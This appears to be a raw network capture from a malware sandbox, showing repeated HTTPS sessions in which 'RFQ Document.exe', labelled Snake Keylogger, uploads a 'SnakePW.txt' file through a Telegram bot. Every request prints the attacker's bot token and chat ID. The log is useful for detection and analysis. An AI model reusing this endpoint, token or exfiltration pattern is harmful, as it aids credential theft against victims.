2021-09-28 05:59:02 UTC	233	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 64 32 64 62 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dad2dbd1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:02 UTC	234	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:02 UTC	234	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12733,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.2.4	49950	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:02 UTC	235	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255daef78f9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:02 UTC	235	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 65 66 37 38 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255daef78f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:02 UTC	235	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:02 UTC	236	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12734,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.2.4	49951	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:02 UTC	236	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255db074f2c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:02 UTC	237	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 30 37 34 66 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255db074f2cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:03 UTC	237	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:03 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:03 UTC	237	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12735,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.2.4	49953	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:03 UTC	238	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255db2d74a4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:03 UTC	238	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 32 64 37 34 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255db2d74a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:03 UTC	239	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:03 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:03 UTC	239	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12736,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49789	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:23 UTC	23	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c3a2432d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:23 UTC	24	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 61 32 34 33 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c3a2432dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:23 UTC	24	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:23 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:23 UTC	24	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12594,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.2.4	49956	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:03 UTC	239	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255db6b7218 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:03 UTC	240	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 36 62 37 32 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255db6b7218Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:03 UTC	240	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:03 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:03 UTC	241	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12737,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.2.4	49958	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:03 UTC	241	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255db91981c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:03 UTC	241	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 39 31 39 38 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255db91981cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:03 UTC	242	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:03 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:03 UTC	242	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12738,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.2.4	49960	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:04 UTC	243	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dbae3519 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:04 UTC	243	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 61 65 33 35 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dbae3519Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
